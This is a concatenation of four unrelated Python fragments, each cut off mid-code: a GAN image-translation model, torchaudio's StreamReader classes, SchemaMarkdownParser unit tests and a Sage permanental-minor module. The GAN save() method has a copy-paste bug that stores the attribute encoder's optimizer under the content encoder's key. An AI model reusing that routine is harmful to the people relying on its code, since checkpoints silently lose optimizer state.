images_b_random = self._normalize_image(self.fake_A_random).detach().cpu().numpy()[0, 0, ::]
if not self.mask is None:
mask_a = self._normalize_image(self.mask_a).detach().cpu().numpy()[0, 0, ::]
mask_b = self._normalize_image(self.mask_b).detach().cpu().numpy()[0, 0, ::]
else:
mask_a = None
mask_b = None
if self.opts.nz == 640:
images_a_attr = self.z_attr_a.view(self.z_attr_a.size(0), 1, 8, 10, 8)
images_b_attr = self.z_attr_b.view(self.z_attr_b.size(0), 1, 8, 10, 8)
images_a_attr = self._normalize_image(images_a_attr).detach().cpu().numpy()[0, 0, ::]
images_b_attr = self._normalize_image(images_b_attr).detach().cpu().numpy()[0, 0, ::]
elif self.opts.nz == 64:
images_a_attr = self.z_attr_a.view(self.z_attr_a.size(0), 1, 8, 8)
images_b_attr = self.z_attr_b.view(self.z_attr_b.size(0), 1, 8, 8)
images_a_attr = self._normalize_image(images_a_attr).detach().cpu().numpy()[0, 0, ::]
images_b_attr = self._normalize_image(images_b_attr).detach().cpu().numpy()[0, 0, ::]
else:
images_a_attr = None
images_b_attr = None
images_a_content = self._normalize_image(torch.mean(self.z_content_a, dim=1, keepdim=True)).detach().cpu().numpy()[0, 0, ::]
images_b_content = self._normalize_image(torch.mean(self.z_content_b, dim=1, keepdim=True)).detach().cpu().numpy()[0, 0, ::]
images_a2 = self._normalize_image(self.fake_B_encoded).detach().cpu().numpy()[0, 0, ::]
images_a3 = self._normalize_image(self.diff_fake_B_encoded).detach().cpu().numpy()[0, 0, ::]
images_b2 = self._normalize_image(self.fake_A_encoded).detach().cpu().numpy()[0, 0, ::]
images_b3 = self._normalize_image(self.diff_fake_A_encoded).detach().cpu().numpy()[0, 0, ::]
return images_a, images_b, images_a1, images_a2, images_a3, images_b1, images_b2, images_b3, images_a_content, \
images_b_content, images_a_attr, images_b_attr,\
images_a_clc, images_b_clc, images_a_random, images_b_random, mask_a, mask_b
def _normalize_image(self, x):
return x[:, 0:3, :, :]
def save(self, filename, ep, total_it, it):
"""
Save networks
:param filename: save path
:param ep: current epoch
:param total_it: total iterations
:param it: current iteration in epoch
:return:
"""
state = {}
state['ep'] = ep
state['total_it'] = total_it
state['it'] = it
state['enc_c'] = self.enc_c.state_dict()
state['enc_a'] = self.enc_a.state_dict()
state['enc_c_opt'] = self.enc_c_opt.state_dict()
state['enc_c_opt'] = self.enc_a_opt.state_dict()
state['disContent'] = self.disContent.state_dict()
state['disContent_opt'] = self.disContent_opt.state_dict()
state['gen'] = self.gen.state_dict()
state['gen_opt'] = self.gen_opt.state_dict()
state['dis1'] = self.dis1.state_dict()
state['dis2'] = self.dis2.state_dict()
state['dis1_opt'] = self.dis1_opt.state_dict()
state['dis2_opt'] = self.dis2_opt.state_dict()
torch.save(state, filename)
return
def resume(self, model_dir, device_0, device_1, train=True):
"""
Load network states
:param model_dir: load path
:param device_0: original gpu device
:param device_1: gpu device to use
:param train: whether to train or test
:return: current epoch, total iterations, current iteration
"""
checkpoint = torch.load(model_dir, map_location={device_0: device_1})
if train:
self.dis1.load_state_dict(checkpoint['dis1'], strict=False)
self.dis2.load_state_dict(checkpoint['dis2'], strict=False)
self.disContent.load_state_dict(checkpoint['disContent'], strict=False)
self.enc_c.load_state_dict(checkpoint['enc_c'], strict=False)
self.enc_a.load_state_dict(checkpoint['enc_a'], strict=False)
self.gen.load_state_dict(checkpoint['gen'], strict=False)
try:
it = checkpoint['it']
except:
it = 0
return checkpoint['ep'], checkpoint['total_it'], it
def test_forward_random_group(self, image, c_org=None, num=50):
"""
Method for translation from one image of one class to another class.
Using rejection sampling - this will give the mean and variance maps.
:param image: image input
:param c_org: label of image
:param num: number of times to sample from attribute latent space (for mean and variance maps)
:return:
"""
z_content = self.enc_c.forward(image)
if len(image.size()) == 5:
output = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
diff_m_pos = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
diff_m_neg = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
else:
output = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
diff_m_pos = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
diff_m_neg = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
output = output.to(self.device)
diff_m_pos = diff_m_pos.to(self.device)
diff_m_neg = diff_m_neg.to(self.device)
z_random = torch.zeros((num, self.nz)).to(self.device)
flag = True
i = 0
k = 0
if c_org[0, 0] == 1:
class_num = 1
elif c_org[0, 1] == 1:
class_num = 0
while flag:
k = k + 1
z_random_temp = self._get_z_random(1, self.nz, 'gauss')
_, _, pred_random, _ = self.enc_a.forward(x=None, z=z_random_temp.detach())
prob, pred_ind = torch.max(pred_random, 1)
if (pred_ind == class_num) and (i < num) and (prob > 0.9):
z_random[i] = z_random_temp
i = i + 1
if i == num - 1:
flag = False
elif k > int(300 * 2 * 50):
z_random = self._get_z_random(num, self.nz, 'gauss')
print('Random z not separable')
flag = False
c_inv = 1 - c_org
for z in range(num):
z_temp = z_random[z].unsqueeze(0)
output[z] = self.gen.forward(x=z_content, z=z_temp, c=c_inv)
diff_m = (output[z].unsqueeze(0) - image)
diff_m_pos[z] = diff_m
diff_m_neg[z] = -diff_m
output = torch.mean(output, dim=0, keepdim=True)
diff_m_pos_mean = torch.mean(diff_m_pos, dim=0, keepdim=True)
diff_m_neg_mean = torch.mean(diff_m_neg, dim=0, keepdim=True)
diff_m_pos_std = torch.std(diff_m_pos, dim=0, keepdim=True)
diff_m_neg_std = -diff_m_pos_std
return output, diff_m_pos_mean, diff_m_neg_mean, diff_m_pos_std, diff_m_neg_std
def | |
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional, Tuple, Dict, Iterator
import torch
import torchaudio
@dataclass
class StreamReaderSourceStream:
"""StreamReaderSourceStream()
The metadata of a source stream. This class is used when representing streams of
media type other than `audio` or `video`.
When source stream is `audio` or `video` type, :py:class:`SourceAudioStream` and
:py:class:`SourceVideoStream`, which reports additional media-specific attributes,
are used respectively.
"""
media_type: str
"""The type of the stream.
One of `audio`, `video`, `data`, `subtitle`, `attachment` and empty string.
.. note::
Only `audio` and `video` streams are supported for output.
.. note::
Still images, such as PNG and JPEG formats are reported as `video`.
"""
codec: str
"""Short name of the codec. Such as `pcm_s16le` and `h264`."""
codec_long_name: str
"""Detailed name of the codec.
Such as `"PCM signed 16-bit little-endian"` and `"H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10"`.
"""
format: Optional[str]
"""Media format. Such as `s16` and `yuv420p`.
Commonly found audio values are;
- `u8`, `u8p`: Unsigned 8-bit unsigned interger.
- `s16`, `s16p`: 16-bit signed integer.
- `s32`, `s32p`: 32-bit signed integer.
- `flt`, `fltp`: 32-bit floating-point.
.. note::
`p` at the end indicates the format is `planar`.
Channels are grouped together instead of interspersed in memory.
"""
bit_rate: Optional[int]
"""Bit rate of the stream in bits-per-second.
This is an estimated values based on the initial few frames of the stream.
For container formats and variable bit rate, it can be 0.
"""
@dataclass
class StreamReaderSourceAudioStream(StreamReaderSourceStream):
"""StreamReaderSourceAudioStream()
The metadata of an audio source stream.
In addition to the attributes reported by :py:func:`SourceStream`,
when the source stream is audio type, then the following additional attributes
are reported.
"""
sample_rate: float
"""Sample rate of the audio."""
num_channels: int
"""Number of channels."""
@dataclass
class StreamReaderSourceVideoStream(StreamReaderSourceStream):
"""StreamReaderSourceVideoStream()
The metadata of a video source stream.
In addition to the attributes reported by :py:func:`SourceStream`,
when the source stream is audio type, then the following additional attributes
are reported.
"""
width: int
"""Width of the video frame in pixel."""
height: int
"""Height of the video frame in pixel."""
frame_rate: float
"""Frame rate."""
# Indices of SrcInfo returned by low-level `get_src_stream_info`
# - COMMON
_MEDIA_TYPE = 0
_CODEC = 1
_CODEC_LONG = 2
_FORMAT = 3
_BIT_RATE = 4
# - AUDIO
_SAMPLE_RATE = 5
_NUM_CHANNELS = 6
# - VIDEO
_WIDTH = 7
_HEIGHT = 8
_FRAME_RATE = 9
def _parse_si(i):
media_type = i[_MEDIA_TYPE]
codec_name = i[_CODEC]
codec_long_name = i[_CODEC_LONG]
if media_type == "audio":
return StreamReaderSourceAudioStream(
media_type,
codec_name,
codec_long_name,
i[_FORMAT],
i[_BIT_RATE],
i[_SAMPLE_RATE],
i[_NUM_CHANNELS],
)
if media_type == "video":
return StreamReaderSourceVideoStream(
media_type,
codec_name,
codec_long_name,
i[_FORMAT],
i[_BIT_RATE],
i[_WIDTH],
i[_HEIGHT],
i[_FRAME_RATE],
)
return StreamReaderSourceStream(media_type, codec_name, codec_long_name, None, None)
@dataclass
class StreamReaderOutputStream:
"""OutputStream()
Output stream configured on :py:class:`StreamReader`.
"""
source_index: int
"""Index of the source stream that this output stream is connected."""
filter_description: str
"""Description of filter graph applied to the source stream."""
def _parse_oi(i):
return StreamReaderOutputStream(i[0], i[1])
class StreamReader:
"""Fetch and decode audio/video streams chunk by chunk.
For the detailed usage of this class, please refer to the tutorial.
Args:
src (str): Source. Can be a file path, URL, device identifier or filter expression.
format (str or None, optional):
Override the input format, or specify the source sound device.
Default: ``None`` (no override nor device input).
This argument serves two different usecases.
1) Override the source format.
This is useful when the input data do not contain a header.
2) Specify the input source device.
This allows to load media stream from hardware devices,
such as microphone, camera and screen, or a virtual device.
.. note::
This option roughly corresponds to ``-f`` option of ``ffmpeg`` command.
Please refer to the ffmpeg documentations for the possible values.
https://ffmpeg.org/ffmpeg-formats.html
For device access, the available values vary based on hardware (AV device) and
software configuration (ffmpeg build).
https://ffmpeg.org/ffmpeg-devices.html
option (dict of str to str, optional):
Custom option passed when initializing format context (opening source).
You can use this argument to change the input source before it is passed to decoder.
Default: ``None``.
"""
def __init__(
self,
src: str,
format: Optional[str] = None,
option: Optional[Dict[str, str]] = None,
):
self._s = torch.ops.torchaudio.ffmpeg_streamer_init(src, format, option)
i = torch.ops.torchaudio.ffmpeg_streamer_find_best_audio_stream(self._s)
self._i_audio = None if i < 0 else i
i = torch.ops.torchaudio.ffmpeg_streamer_find_best_video_stream(self._s)
self._i_video = None if i < 0 else i
@property
def num_src_streams(self):
"""Number of streams found in the provided media source.
:type: int
"""
return torch.ops.torchaudio.ffmpeg_streamer_num_src_streams(self._s)
@property
def num_out_streams(self):
"""Number of output streams configured by client code.
:type: int
"""
return torch.ops.torchaudio.ffmpeg_streamer_num_out_streams(self._s)
@property
def default_audio_stream(self):
"""The index of default audio stream. ``None`` if there is no audio stream
:type: Optional[int]
"""
return self._i_audio
@property
def default_video_stream(self):
"""The index of default video stream. ``None`` if there is no video stream
:type: Optional[int]
"""
return self._i_video
def get_src_stream_info(self, i: int) -> torchaudio.io.StreamReaderSourceStream:
"""Get the metadata of source stream
Args:
i (int): Stream index.
Returns:
SourceStream
"""
return _parse_si(torch.ops.torchaudio.ffmpeg_streamer_get_src_stream_info(self._s, i))
def get_out_stream_info(self, i: int) -> torchaudio.io.StreamReaderOutputStream:
"""Get the metadata of output stream
Args:
i (int): Stream index.
Returns:
OutputStream
"""
return _parse_oi(torch.ops.torchaudio.ffmpeg_streamer_get_out_stream_info(self._s, i))
def seek(self, timestamp: float):
"""Seek the stream to the given timestamp [second]
Args:
timestamp (float): Target time in second.
"""
torch.ops.torchaudio.ffmpeg_streamer_seek(self._s, timestamp)
def add_basic_audio_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
sample_rate: Optional[int] = None,
dtype: torch.dtype = torch.float32,
):
"""Add output audio stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source audio stream index.
If omitted, :py:attr:`default_audio_stream` is used.
sample_rate (int or None, optional): If provided, resample the audio.
dtype (torch.dtype, optional): If not ``None``, change the output sample precision.
If floating point, then the sample value range is
`[-1, 1]`.
"""
i = self.default_audio_stream if stream_index is None else stream_index
torch.ops.torchaudio.ffmpeg_streamer_add_basic_audio_stream(
self._s, i, frames_per_chunk, buffer_chunk_size, sample_rate, dtype
)
def add_basic_video_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
frame_rate: Optional[int] = None,
width: Optional[int] = None,
height: Optional[int] = None,
format: str = "RGB",
):
"""Add output video stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source video stream index.
If omitted, :py:attr:`default_video_stream` is used.
frame_rate (int or None, optional): If provided, change the frame rate.
width (int or None, optional): If provided, change the image width. Unit: Pixel.
height (int or None, optional): If provided, change the image height. Unit: Pixel.
format (str, optional): Change the format of image channels. Valid values are,
- `RGB`: 8 bits * 3 channels
- `BGR`: 8 bits * 3 channels
- `YUV`: 8 bits * 3 channels
- `GRAY`: 8 bits * 1 channels
"""
i = self.default_video_stream if stream_index is None else stream_index
torch.ops.torchaudio.ffmpeg_streamer_add_basic_video_stream(
self._s,
i,
frames_per_chunk,
buffer_chunk_size,
frame_rate,
width,
height,
format,
)
def add_audio_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
filter_desc: Optional[str] = None,
decoder: Optional[str] = None,
decoder_options: Optional[Dict[str, str]] = None,
):
"""Add output audio stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source audio stream index.
If omitted, :py:attr:`default_audio_stream` is used.
filter_desc (str or None, | |
member 'a'",
":11: error: Redefinition of 'MyAction2_path' member 'b'",
":13: error: Redefinition of 'MyAction2_query' member 'a'",
":15: error: Redefinition of 'MyAction2_input' member 'b'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_path_base_types(self):
parser = SchemaMarkdownParser()
parser.parse_string('''\
struct Foo
int a
optional string b
struct Bonk
float(nullable) c
typedef Bonk Bar
action FooAction
path (Foo)
bool c
action BarAction
path (Foo, Bar)
datetime d
''')
self.assertDictEqual(parser.types, {
'Bar': {
'typedef': {
'name': 'Bar',
'type': {'user': 'Bonk'}
}
},
'BarAction': {
'action': {
'name': 'BarAction',
'path': 'BarAction_path'
}
},
'BarAction_path': {
'struct': {
'name': 'BarAction_path',
'bases': ['Foo', 'Bar'],
'members': [
{'name': 'd', 'type': {'builtin': 'datetime'}}
]
}
},
'Bonk': {
'struct': {
'name': 'Bonk',
'members': [
{'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
]
}
},
'Foo': {
'struct': {
'name': 'Foo',
'members': [
{'name': 'a', 'type': {'builtin': 'int'}},
{'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
]
}
},
'FooAction': {
'action': {
'name': 'FooAction',
'path': 'FooAction_path'
}
},
'FooAction_path': {
'struct': {
'name': 'FooAction_path',
'bases': ['Foo'],
'members': [
{'name': 'c', 'type': {'builtin': 'bool'}}
]
}
}
})
self.assertListEqual(parser.errors, [])
def test_action_path_non_struct(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
path (Foo)
#- will not error
float a
enum Foo
A
B
struct MyStruct
int a
action BarAction
path (Foo, MyStruct)
union MyUnion
action BonkAction
path (MyStruct, MyUnion)
float a
typedef string{} MyDict
action MyDictAction
path (MyDict)
int a
''')
expected_errors = [
":2: error: Invalid struct base type 'Foo'",
":14: error: Invalid struct base type 'Foo'",
":19: error: Invalid struct base type 'MyUnion'",
":20: error: Redefinition of 'BonkAction_path' member 'a'",
":25: error: Invalid struct base type 'MyDict'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_query_base_types(self):
parser = SchemaMarkdownParser()
parser.parse_string('''\
struct Foo
int a
optional string b
struct Bonk
float(nullable) c
typedef Bonk Bar
action FooAction
query (Foo)
bool c
action BarAction
query (Foo, Bar)
datetime d
''')
self.assertDictEqual(parser.types, {
'Bar': {
'typedef': {
'name': 'Bar',
'type': {'user': 'Bonk'}
}
},
'BarAction': {
'action': {
'name': 'BarAction',
'query': 'BarAction_query'
}
},
'BarAction_query': {
'struct': {
'name': 'BarAction_query',
'bases': ['Foo', 'Bar'],
'members': [
{'name': 'd', 'type': {'builtin': 'datetime'}}
]
}
},
'Bonk': {
'struct': {
'name': 'Bonk',
'members': [
{'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
]
}
},
'Foo': {
'struct': {
'name': 'Foo',
'members': [
{'name': 'a', 'type': {'builtin': 'int'}},
{'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
]
}
},
'FooAction': {
'action': {
'name': 'FooAction',
'query': 'FooAction_query'
}
},
'FooAction_query': {
'struct': {
'name': 'FooAction_query',
'bases': ['Foo'],
'members': [
{'name': 'c', 'type': {'builtin': 'bool'}}
]
}
}
})
self.assertListEqual(parser.errors, [])
def test_action_query_non_struct(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
query (Foo)
#- will not error
float a
enum Foo
A
B
struct MyStruct
int a
action BarAction
query (Foo, MyStruct)
union MyUnion
action BonkAction
query (MyStruct, MyUnion)
float a
typedef string{} MyDict
action MyDictAction
query (MyDict)
int a
''')
expected_errors = [
":2: error: Invalid struct base type 'Foo'",
":14: error: Invalid struct base type 'Foo'",
":19: error: Invalid struct base type 'MyUnion'",
":20: error: Redefinition of 'BonkAction_query' member 'a'",
":25: error: Invalid struct base type 'MyDict'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_input_base_types(self):
parser = SchemaMarkdownParser()
parser.parse_string('''\
struct Foo
int a
optional string b
struct Bonk
float(nullable) c
typedef Bonk Bar
action FooAction
input (Foo)
bool c
action BarAction
input (Foo, Bar)
datetime d
''')
self.assertDictEqual(parser.types, {
'Bar': {
'typedef': {
'name': 'Bar',
'type': {'user': 'Bonk'}
}
},
'BarAction': {
'action': {
'name': 'BarAction',
'input': 'BarAction_input'
}
},
'BarAction_input': {
'struct': {
'name': 'BarAction_input',
'bases': ['Foo', 'Bar'],
'members': [
{'name': 'd', 'type': {'builtin': 'datetime'}}
]
}
},
'Bonk': {
'struct': {
'name': 'Bonk',
'members': [
{'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
]
}
},
'Foo': {
'struct': {
'name': 'Foo',
'members': [
{'name': 'a', 'type': {'builtin': 'int'}},
{'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
]
}
},
'FooAction': {
'action': {
'name': 'FooAction',
'input': 'FooAction_input'
}
},
'FooAction_input': {
'struct': {
'name': 'FooAction_input',
'bases': ['Foo'],
'members': [
{'name': 'c', 'type': {'builtin': 'bool'}}
]
}
}
})
self.assertListEqual(parser.errors, [])
def test_action_input_non_struct(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
input (Foo)
#- will not error
float a
enum Foo
A
B
struct MyStruct
int a
action BarAction
input (Foo, MyStruct)
union MyUnion
action BonkAction
input (MyStruct, MyUnion)
float a
typedef string{} MyDict
action MyDictAction
input (MyDict)
int a
''')
expected_errors = [
":2: error: Invalid struct base type 'Foo'",
":14: error: Invalid struct base type 'Foo'",
":19: error: Invalid struct base type 'MyUnion'",
":20: error: Redefinition of 'BonkAction_input' member 'a'",
":25: error: Invalid struct base type 'MyDict'",
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_input_member_redef(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
input (Foo)
#- will not error
float a
enum Foo
A
B
struct MyStruct
int a
action BarAction
input (Foo, MyStruct)
union MyUnion
action BonkAction
input (MyStruct, MyUnion)
float a
typedef string{} MyDict
action MyDictAction
input (MyDict)
int a
''')
expected_errors = [
":2: error: Invalid struct base type 'Foo'",
":14: error: Invalid struct base type 'Foo'",
":19: error: Invalid struct base type 'MyUnion'",
":20: error: Redefinition of 'BonkAction_input' member 'a'",
":25: error: Invalid struct base type 'MyDict'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_output_struct(self):
parser = SchemaMarkdownParser()
parser.parse_string('''\
struct Foo
int a
optional string b
struct Bonk
float(nullable) c
typedef Bonk Bar
action FooAction
output (Foo)
bool c
action BarAction
output (Foo, Bar)
datetime d
''')
self.assertDictEqual(parser.types, {
'Bar': {
'typedef': {
'name': 'Bar',
'type': {'user': 'Bonk'}
}
},
'BarAction': {
'action': {
'name': 'BarAction',
'output': 'BarAction_output'
}
},
'BarAction_output': {
'struct': {
'name': 'BarAction_output',
'bases': ['Foo', 'Bar'],
'members': [
{'name': 'd', 'type': {'builtin': 'datetime'}}
]
}
},
'Bonk': {
'struct': {
'name': 'Bonk',
'members': [
{'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
]
}
},
'Foo': {
'struct': {
'name': 'Foo',
'members': [
{'name': 'a', 'type': {'builtin': 'int'}},
{'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
]
}
},
'FooAction': {
'action': {
'name': 'FooAction',
'output': 'FooAction_output'
}
},
'FooAction_output': {
'struct': {
'name': 'FooAction_output',
'bases': ['Foo'],
'members': [
{'name': 'c', 'type': {'builtin': 'bool'}}
]
}
}
})
self.assertListEqual(parser.errors, [])
def test_action_output_non_struct(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
output (Foo)
#- will not error
float a
enum Foo
A
B
struct MyStruct
int a
action BarAction
output (Foo, MyStruct)
union MyUnion
action BonkAction
output (MyStruct, MyUnion)
float a
typedef string{} MyDict
action MyDictAction
output (MyDict)
#- will not error
int a
''')
expected_errors = [
":2: error: Invalid struct base type 'Foo'",
":14: error: Invalid struct base type 'Foo'",
":19: error: Invalid struct base type 'MyUnion'",
":20: error: Redefinition of 'BonkAction_output' member 'a'",
":25: error: Invalid struct base type 'MyDict'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_action_errors_enum(self):
parser = SchemaMarkdownParser()
parser.parse_string('''\
action FooAction
errors (Foo)
C
enum Foo
A
B
enum Bonk
C
typedef Bonk Bar
action BarAction
errors (Foo, Bar)
D
''')
self.assertDictEqual(parser.types, {
'Bar': {
'typedef': {
'name': 'Bar',
'type': {'user': 'Bonk'}
}
},
'BarAction': {
'action': {
'name': 'BarAction',
'errors': 'BarAction_errors'
}
},
'BarAction_errors': {
'enum': {
'name': 'BarAction_errors',
'bases': ['Foo', 'Bar'],
'values': [
{'name': 'D'}
]
}
},
'Bonk': {
'enum': {
'name': 'Bonk',
'values': [
{'name': 'C'}
]
}
},
'Foo': {
'enum': {
'name': 'Foo',
'values': [
{'name': 'A'},
{'name': 'B'}
]
}
},
'FooAction': {
'action': {
'errors': 'FooAction_errors',
'name': 'FooAction'
}
},
'FooAction_errors': {
'enum': {
'name': 'FooAction_errors',
'bases': ['Foo'],
'values': [
{'name': 'C'}
]
}
}
})
self.assertListEqual(parser.errors, [])
def test_action_errors_non_enum(self):
parser = SchemaMarkdownParser()
with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
parser.parse_string('''\
action FooAction
errors (Foo)
struct Foo
struct Bonk
typedef Bonk Bar
enum MyEnum
A
action BarAction
errors (MyEnum, Bar)
A
action BonkAction
errors (MyEnum)
A
''')
expected_errors = [
":2: error: Invalid enum base type 'Foo'",
":14: error: Invalid enum base type 'Bar'",
":15: error: Redefinition of 'BarAction_errors' value 'A'",
":19: error: Redefinition of 'BonkAction_errors' value 'A'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
def test_finalize_no_parse(self):
types = {
'MyAction': {
'action': {
'name': 'MyAction',
'query': 'MyAction_query'
}
},
'MyAction_query': {
'struct': {
'name': 'MyAction_query',
'members': [
{'name': 'a', 'type': {'builtin': 'int'}}
]
}
},
'OtherType': {}
}
parser = SchemaMarkdownParser(types=types)
parser.finalize()
self.assertIs(parser.types, types)
def test_finalize_no_parse_error(self):
types = {
'MyAction': {
'action': {
'name': 'MyAction',
'query': 'MyAction_query',
'input': 'PositiveInt',
'output': 'MyAction_output'
}
},
'MyAction_input': {
'struct': {
'name': 'MyAction_input',
| |
"""
Miscellaneous matrix functions
"""
# ****************************************************************************
# Copyright (C) 2008 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.categories.fields import Fields
_Fields = Fields()
def row_iterator(A):
for i in range(A.nrows()):
yield A.row(i)
def prm_mul(p1, p2, mask_free, prec):
"""
Return the product of ``p1`` and ``p2``, putting free variables in
``mask_free`` to `1`.
This function is mainly use as a subroutine of
:func:`permanental_minor_polynomial`.
INPUT:
- `p1,p2` -- polynomials as dictionaries
- `mask_free` -- an integer mask that give the list of free variables
(the `i`-th variable is free if the `i`-th bit of ``mask_free`` is `1`)
- `prec` -- if `prec` is not None, truncate the product at precision `prec`
EXAMPLES::
sage: from sage.matrix.matrix_misc import prm_mul
sage: t = polygen(ZZ, 't')
sage: p1 = {0: 1, 1: t, 4: t}
sage: p2 = {0: 1, 1: t, 2: t}
sage: prm_mul(p1, p2, 1, None)
{0: 2*t + 1, 2: t^2 + t, 4: t^2 + t, 6: t^2}
"""
p = {}
if not p2:
return p
for exp1, v1 in p1.items():
if v1.is_zero():
continue
for exp2, v2 in p2.items():
if exp1 & exp2:
continue
v = v1 * v2
if prec is not None:
v._unsafe_mutate(prec, 0)
exp = exp1 | exp2
exp = exp ^ (exp & mask_free)
if exp not in p:
p[exp] = v
else:
p[exp] += v
return p
def permanental_minor_polynomial(A, permanent_only=False, var='t', prec=None):
r"""
Return the polynomial of the sums of permanental minors of ``A``.
INPUT:
- `A` -- a matrix
- `permanent_only` -- if True, return only the permanent of `A`
- `var` -- name of the polynomial variable
- `prec` -- if prec is not None, truncate the polynomial at precision `prec`
The polynomial of the sums of permanental minors is
.. MATH::
\sum_{i=0}^{min(nrows, ncols)} p_i(A) x^i
where `p_i(A)` is the `i`-th permanental minor of `A` (that can also be
obtained through the method
:meth:`~sage.matrix.matrix2.Matrix.permanental_minor` via
``A.permanental_minor(i)``).
The algorithm implemented by that function has been developed by <NAME>
and <NAME>, see [BP2015]_. Its complexity is `O(2^n m^2 n)` where `m` and
`n` are the number of rows and columns of `A`. Moreover, if `A` is a banded
matrix with width `w`, that is `A_{ij}=0` for `|i - j| > w` and `w < n/2`,
then the complexity of the algorithm is `O(4^w (w+1) n^2)`.
INPUT:
- ``A`` -- matrix
- ``permanent_only`` -- optional boolean. If ``True``, only the permanent
is computed (might be faster).
- ``var`` -- a variable name
EXAMPLES::
sage: from sage.matrix.matrix_misc import permanental_minor_polynomial
sage: m = matrix([[1,1],[1,2]])
sage: permanental_minor_polynomial(m)
3*t^2 + 5*t + 1
sage: permanental_minor_polynomial(m, permanent_only=True)
3
sage: permanental_minor_polynomial(m, prec=2)
5*t + 1
::
sage: M = MatrixSpace(ZZ,4,4)
sage: A = M([1,0,1,0,1,0,1,0,1,0,10,10,1,0,1,1])
sage: permanental_minor_polynomial(A)
84*t^3 + 114*t^2 + 28*t + 1
sage: [A.permanental_minor(i) for i in range(5)]
[1, 28, 114, 84, 0]
An example over `\QQ`::
sage: M = MatrixSpace(QQ,2,2)
sage: A = M([1/5,2/7,3/2,4/5])
sage: permanental_minor_polynomial(A, True)
103/175
An example with polynomial coefficients::
sage: R.<a> = PolynomialRing(ZZ)
sage: A = MatrixSpace(R,2)([[a,1], [a,a+1]])
sage: permanental_minor_polynomial(A, True)
a^2 + 2*a
A usage of the ``var`` argument::
sage: m = matrix(ZZ,4,[0,1,2,3,1,2,3,0,2,3,0,1,3,0,1,2])
sage: permanental_minor_polynomial(m, var='x')
164*x^4 + 384*x^3 + 172*x^2 + 24*x + 1
ALGORITHM:
The permanent `perm(A)` of a `n \times n` matrix `A` is the coefficient
of the `x_1 x_2 \ldots x_n` monomial in
.. MATH::
\prod_{i=1}^n \left( \sum_{j=1}^n A_{ij} x_j \right)
Evaluating this product one can neglect `x_i^2`, that is `x_i`
can be considered to be nilpotent of order `2`.
To formalize this procedure, consider the algebra
`R = K[\eta_1, \eta_2, \ldots, \eta_n]` where the `\eta_i` are
commuting, nilpotent of order `2` (i.e. `\eta_i^2 = 0`).
Formally it is the quotient ring of the polynomial
ring in `\eta_1, \eta_2, \ldots, \eta_n` quotiented by the ideal
generated by the `\eta_i^2`.
We will mostly consider the ring `R[t]` of polynomials over `R`. We
denote a generic element of `R[t]` by `p(\eta_1, \ldots, \eta_n)` or
